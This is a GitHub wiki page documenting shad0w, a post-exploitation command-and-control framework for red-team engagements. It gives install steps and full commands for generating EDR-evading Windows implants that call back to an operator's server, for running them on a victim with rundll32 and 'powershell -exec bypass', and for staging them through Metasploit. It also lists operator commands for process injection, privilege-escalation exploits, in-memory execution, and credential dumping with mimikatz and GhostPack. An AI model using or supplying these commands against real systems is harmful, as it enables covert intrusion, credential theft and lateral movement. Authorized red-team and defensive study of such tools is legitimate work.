Skip to content
Lee Baird edited this page Jan 7, 2021 · 138 revisions

Table of Contents

Overview

Beacons

Setting Up the C2

Catching Meterpreter Callbacks

Interacting with Beacons


Overview

Post exploitation is large part of a red team engagement. While many organizations begin to mature and start to deploy a wide range of sophisticated Endpoint Detection & Response (EDR) solutions onto their networks, it requires us as attackers to also mature. We need to upgrade our arsenal to give us the capabilities to successfully operate on advanced networks. This is why shad0w was built.

shad0w is a post exploitation framework that is designed to operate covertly on advanced networks, providing the operator with much greater control over their engagements. In the future, I will be working on implementing a teamserver and GUI clients along with some cool new features.

If you want to help with the development, feel free to make pull requests or DM me on twitter @batsec or on Discord at the Porchetta Industries server on the shad0w channel.

Requirements

shad0w is designed to be ran inside of Docker. This will make life easier for the operator as it has some very specific dependencies which are required for it to function correctly.

sudo apt install -y docker.io
sudo systemctl enable docker --now
docker

Installation

In order for certain modules and scripts to run, shad0w must be installed in the /root/ directory.

cd /root/
git clone --recurse-submodules https://github.com/bats3c/shad0w.git  
cd shad0w  
sudo ./shad0w install

It takes about 10 minutes to build the Docker container.

Starting shad0w

Once the build is finished, you will be able to use the shad0w command. This command should be used to launch shad0w rather than running it manually via Docker.

shad0w --help
usage: shad0w [-h] {listen,beacon,update} ...

positional arguments:
  {listen,beacon,update}
                        shad0w C2 functions
    listen              Tell shad0w to listen for connections
    beacon              Tell shad0w to create a beacon
    update              Update shad0w

optional arguments:
  -h, --help            show this help message and exit

Beacons

shad0w implants are called beacons. There are two types of beacons:

  • Secure beacons are designed to operate in environments where it is vital to remain undetected.
  • Insecure beacons are for environments where security is much more relaxed.
shad0w beacon --help
usage: shad0w beacon [-h] -p PAYLOAD -H ADDRESS [-P PORT] [-j JITTER] -f {raw,exe,psh,dll} -o OUT [-n] [-d]

optional arguments:
  -h, --help            show this help message and exit
  -p PAYLOAD, --payload PAYLOAD
                        Beacon payload to use
  -H ADDRESS, --address ADDRESS
                        Address the beacon will connect to
  -P PORT, --port PORT  Port the beacon will connect on
  -j JITTER, --jitter JITTER
                        Jitter the beacon should use when connecting back
  -f {raw,exe,psh,dll}, --format {raw,exe,psh,dll}
                        Format to store the beacon payload as
  -o OUT, --out OUT     File to store the beacon in
  -n, --no-shrink       Leave the file at its final size, do not attempt to shrink it
  -d, --debug           Start debug mode

Beacons have two payload options:

  • Staged payloads only contain a stub, which will download and execute the rest of the payload.
  • Static payloads are self contained and store all the beacon code inside. This will cause the payload to be much larger in size.

There is also support for Metasploit reverse_https stagers, which will be covered in more detail later.

Payload

The payload is controlled with the -p flag. The format consists of arch / os / security / static.

To generate a 64-bit secure staged Windows beacon, the payload string would be x64/windows/secure.
To generate a static beacon, the payload string would be x64/windows/secure/static.

Currently there is only support for 64-bit Windows. In the future, there will be a much wider range of architectures and operating systems supported.

Address

The IP address or domain that the beacon will callback to. This can either be a redirector or the C2 depending on your tradecraft. This option is set with the -H flag.

Port

The port that the beacon will call back on. By default, this is set to 443. This option can be changed with the -P flag.

Jitter

The delay between callbacks that the beacon will make. By default, this is set to 1 second. This option can be changed with the -j flag.

Format

The format of the beacon. Currently there are 4 different formats: EXE, DLL, PowerShell and ShellCode. They correspond to exe, dll, psh and raw respectively. This option is set with the -f flag.

Output

The file used to store the generated beacon. This option is set with the -o flag.

No Shrink

Because of the JSON library that the beacons uses, the file size can be quite big. To reduce the file size, the EXE will be compressed via UPX. Obfuscation methods are then leveraged to hide the fact that UPX was used. To skip this stage, use the -n flag.

Debug Mode

To compile the beacon in debug mode, use the -d flag.

Examples

Generate a secure staged beacon in EXE format.

shad0w beacon -p x64/windows/secure -H 192.168.0.20 -f exe -o update-staged.exe
The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
make the payload a lot more resistant to EDR products, but can also make it more unstable.
It has been tested on:
    x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
    x64 Windows Server 2019
It may work on other systems as well.

[+] Created update.exe (340992 bytes)

Generate a secure static beacon in EXE format.

shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f exe -o update.exe
The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
make the payload a lot more resistant to EDR products, but can also make it more unstable.
It has been tested on:
    x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
    x64 Windows Server 2019
It may work on other systems as well.

Static payloads can be very large and much easier to detect. For use in droppers, loaders, 
exploits, etc, staged payloads are recommended as they are much smaller and easier to use.

[+] Created update.exe (673792 bytes)

Generate a secure static beacon in DLL format.
Size: 753648 bytes
This payload can be used for persistence or DLL hijacking.

shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f dll -o update.dll

To execute locally on the victim:

C:\Users\lee\Downloads>rundll32 update.dll,x

You will see a pop-up error message. If you click on OK, you will lose your beacon.
This execution method is just for testing the payload and is not for use in the real world.

Generate a secure static beacon in PowerShell format.
Size: 3263906 bytes

shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f psh -o update.ps1

To execute locally on the victim:

C:\Users\lee\Downloads>powershell -nop -exec bypass
PS C:\Users\lee\Downloads>.\update.ps1

Generate a secure static beacon in ShellCode format.
Size: 661664 bytes

shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f raw -o update.bin

Generate a secure staged beacon in ShellCode format.
Size: 336080 bytes

shad0w beacon -p x64/windows/secure -H 192.168.0.20 -f raw -o update-staged.bin

Setting Up the C2

Each user must spin up their own C2 instance. This is done by using the listen argument when calling shad0w.

shad0w listen --help
usage: shad0w listen [-h] [-a ADDRESS] [-p PORT] [-k KEY] [-c CERT] [-m MIRROR] [-d] [-e ENDPOINT]

optional arguments:
  -h, --help            show this help message and exit
  -a ADDRESS, --address ADDRESS
                        Address shad0w will listen on (default will be 0.0.0.0)
  -p PORT, --port PORT  Port the C2 will bind to (default is 443)
  -k KEY, --key KEY     Private key for the HTTPS server
  -c CERT, --cert CERT  Certificate for the HTTPS server
  -m MIRROR, --mirror MIRROR
                        Website to mirror for if a client connects to the C2 via a web browser
  -d, --debug           Start debug mode
  -e ENDPOINT, --endpoint ENDPOINT
                        The endpoint shad0w modules will callback to

Address

The IP address that the C2 will listen on. This option is set with the -a flag.

Port

The port that the C2 will listen on. This option is set with the -p flag.

Key

By using the -k flag, you are able to tell the C2 to use different keys. You are also able generate new defaults by running make in the certs directory.

Certificate

By using the -c flag, you are able to tell the C2 to use different certificates. You are also able generate new defaults by running make in the certs directory.

Mirror

The C2 provides the ability to live proxy a website. If connected to by a web browser, the C2 will proxy all content to and from the website its mirroring. This option is set with the -m flag.

Debug Mode

This option is set with the -d flag.

Endpoint

The first place the beacon will callback to. This can either be a redirector or the C2 depending on your tradecraft. This should be the same option you set for -H when creating a beacon. This option is set with the -e flag.

Example

It takes about 10 seconds to compile fresh payloads for use with stagers and exploits.

shad0w listen -e 192.168.0.20

███████╗██╗  ██╗ █████╗ ██████╗  ██████╗ ██╗    ██╗
██╔════╝██║  ██║██╔══██╗██╔══██╗██╔═████╗██║    ██║
███████╗███████║███████║██║  ██║██║██╔██║██║ █╗ ██║
╚════██║██╔══██║██╔══██║██║  ██║████╔╝██║██║███╗██║
███████║██║  ██║██║  ██║██████╔╝╚██████╔╝╚███╔███╔╝
╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═════╝  ╚═════╝  ╚══╝╚══╝

[i] Starting HTTPS server (0.0.0.0:443)
shad0w ≫

No Active Beacon

Catching Meterpreter Callbacks

Instead of rewriting every Metasploit exploit and auxiliary module, I figured the more sane option would be to add support for Metasploit stagers. This allows you to load a shad0w beacon instead of Meterpreter. Doing this only requires a couple of extra steps.

  1. Make sure the LHOST and LPORT options point to the shad0w C2.
  2. Disable the default Metasploit payload handler.
  3. Set the exit function to none.
  4. Set the StagerURILength. This is important so that the C2 will be able to identify a Meterpreter stager callback. It can be set to any value. but you must remember it.
  5. It is only possible to stage a shad0w beacon over reverse_https stagers. The payload will need to be set to this.
msf6 > set DisablePayloadHandler true
msf6 > set EXITFUNC none
msf6 > set StagerURILength 1337
msf6 > set payload windows/x64/meterpreter/reverse_https
  1. Set the MsfUriSize variable in shad0w to the same value as StagerURILength in Metasploit.
shad0w ≫ set -v MsfUriSize -d 1337

When the Metasploit module is ran, if it executes successfully you will be receive a shad0w beacon.

run_exploit

listener

Interacting with Beacons

Use beacons to list and interact with beacons.

beacons

Use the -i flag followed by a beacon number to interact with a particular beacon.

interact

When you interact with a beacon, a white bar at the bottom of the Terminal will appear containing information about the beacon.

bar

Use help to show the available commands.

File System

Shad0w uses Linux style commands to interact with a target's file system.

Use ls to list files in a directory.

ls

Use cd to change the current directory.

cd

Use pwd to print the current working directory and rm to delete files.

rm

Use mkdir to create a new directory.

mkdir

Process Management

It is important once you have an active beacon that you are not confined to a single process. Shad0w allows you to list, migrate and spawn new beacons and processes.

Use getpid to show information about the current process a beacon is running in.

getpid

Use ps to show the current processes.

ps

Use migrate with the -p flag and a process number to migrate the current beacon to a new process.

migrate

Use binject with the -p flag and a process number to inject a new copy of the current beacon into another process.

binject

Use shinject and dllinject to inject both raw shellcode and DLLs into a process.

shad0w(SYSTEM@DC01) ≫ shinject -p 8725 -f shellcode.bin
shad0w(SYSTEM@DC01) ≫ dllinject -p 4267 -f yourfile.dll

Privilege Escalation

Use elevate with the following flags for privilege escalation:

  • -l to list available exploits.
  • -c to check if the target is vulnerable to an exploit.
  • -u to use an exploit on a target.

elevate

In Memory Code Execution

Use execute to execute .NET assemblies, DLLs, EXEs, JS, VBS or XSL files in memory.
The file must be passed with the -f flag and any arguments with the -p flag.

execute

SOCKS Proxy

A slightly custom version of SharpSocks is currently used for SOCKS proxying.
Use the -q flag to setup a quick SOCKS connection.

socks

Using the server and listen arguments, it is possible to create much more complex SOCKS connection.

Unmanaged PowerShell

Use psh for unmanaged PowerShell execution. This option is very flexible and allows you to perform a wide range of actions.

Use the -c flag to execute a single PowerShell query.

psh

Use the -l flag to list the currently available modules.
Additional modules can be added by placing them in the scripts directory and rebuilding shad0w.

modules

Use the -m flag to import modules. This will host the modules on a random path on the C2. The module will then be downloaded and invoked before the command specified with the -c flag is executed.

psh2

Use the -i flag to get information about modules.

.NET Enumeration

Use dotnet to list the available .NET versions.

dotnet

GhostPack

There are modules for all of the GhostPack binaries:

  • rubeus
  • safetykatz
  • seatbelt
  • sharpchrome
  • sharpdpapi
  • sharpdump
  • sharpup
  • sharpwmi

This will allows you to run them from a single command, without having to execute anything.

rubeus

Using these modules, it is possible to perform a wide range of lateral movement techniques.

BloodHound

There is BloodHound support via the sharphound command. Like all modules, it supports all the command line switches of the original program.

Once sharphound has run, use download to download the output.

sharphound

Mimikatz

This option extends features even further allowing you to perform actions such as dcsync and pth.

mimikatz

Kill a Beacon

Use die to kill a beacon. You will receive a warning. When you provide the -y command the beacon will be killed.

die

Clone this wiki locally